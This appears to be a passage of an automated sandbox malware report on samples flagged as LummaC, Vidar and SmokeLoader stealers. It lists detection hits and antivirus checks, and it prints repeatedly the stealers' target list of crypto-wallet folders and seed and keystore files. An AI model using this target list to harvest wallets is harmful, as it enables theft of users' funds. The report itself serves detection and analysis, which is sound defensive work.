Source: C:\Users\user\AppData\Local\Temp\A247.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: A247.exe, 00000005.00000002.2872781231.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2723791713.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2688986556.000000000096F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\A247.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected CryptOne packer
Source: Yara match File source: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A247.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: A247.exe, 00000005.00000003.2723762834.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Opens network shares
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: \\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: \\config\ Jump to behavior
Tries to harvest and steal Bitcoin Wallet information
